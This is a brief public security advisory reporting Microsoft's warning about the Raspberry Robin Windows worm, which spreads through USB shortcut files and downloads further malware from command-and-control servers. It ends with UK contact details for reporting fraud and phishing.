Microsoft has released an official intelligence advisory warning of a Windows worm dubbed ‘Raspberry Robin’ which is infecting the network of hundreds of organisations.

The malware was first seen in September 2021 with infections observed in organisations that have ties to technology and manufacturing sectors.

Raspberry Robin is typically introduced via infected removable drives, often USB devices that include a [.]LNK file masquerading as a legitimate folder (a LNK file is a Windows shortcut, which points to and is used to open another file).

When a user clicks on this file, the malware launches another malicious file by starting a msiexec[.]exe (Windows Installer) process which attempts to connect to a short URL to communicate with command-and-control (C2) servers controlled by the threat actors.

If the connection is successful, the final step consists of the C2 servers downloading further malicious dynamic-link libraries (DLLs - a collection of small programs that larger programs can load when needed to complete specific tasks) that are suspected of being used to gain persistence on compromised systems.

While there has been significant research carried out and several infections identified, researchers are yet to attribute Raspberry Robin to a threat group and the objectives of the malware remain unanswered at this stage.

However, Microsoft has tagged this campaign as high-risk given that Raspberry Robin could not only be used by threat actors as an entry point into the target network but could also allow them to download and deploy additional malware within the victims' networks and escalate their privileges at any time.

Reporting

Report all Fraud and Cybercrime to Action Fraud by calling 0300 123 2040 or online. Forward suspicious emails to report@phishing.gov.uk. Report SMS scams by forwarding the original message to 7726 (spells SPAM on the keypad).